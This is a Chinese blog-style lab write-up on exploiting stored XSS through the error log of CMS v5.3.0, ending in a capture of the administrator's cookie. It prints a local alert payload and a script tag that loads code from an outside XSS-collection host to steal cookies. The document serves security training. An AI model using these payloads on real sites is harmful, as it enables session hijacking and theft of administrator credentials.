存储型XSS靶场

我们看到靶场使用的是CMSv5.3.0,于是上网搜索它存在的漏洞

具体漏洞解析如这篇文章所示https://www.freebuf.com/column/165269.html

我们这里利用错误日记插入存储型xss。当我们访问不存在的文件,页面时会产生错误。产生的错误会记录到错误日志里面,源码错误日记把记录的恶意语句没有过滤,当管理员在后台点击查看错误的日志时,存储型XSS就会触发。

我们这里先用自建环境运行试验一下

在url里输入如下命令,显示了弹窗,说明存在xss漏洞

http://127.0.0.1/index.php?c=mail&m=test<script>alert(/XSS/)</script>

并且页面跳转404,说明不存在文件

登录管理页面,管理员查看错误日志时会发现弹窗,这时存储型XSS已被触发

我们在XSSPT上使用一个极限代码如下,插入url中

<sCRiPt/SrC=//xsshs.cn/bXEW>

开发者工具中显示了一个存储型XSS的文件

登录管理员界面访问错误日志

再登录xsspt我们可以看到被打的cookie和网页其他相关信息

 

 

靶场

在这里操作步骤和搭建环境中实验情况类似,步骤不再赘述,不过我一直在xsspt打不到cookie,可能是boot的原因吧

 

 

最后用xsssh站点,选择老默认模块,按照原来步骤,最后打到cookie

 

 

 

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值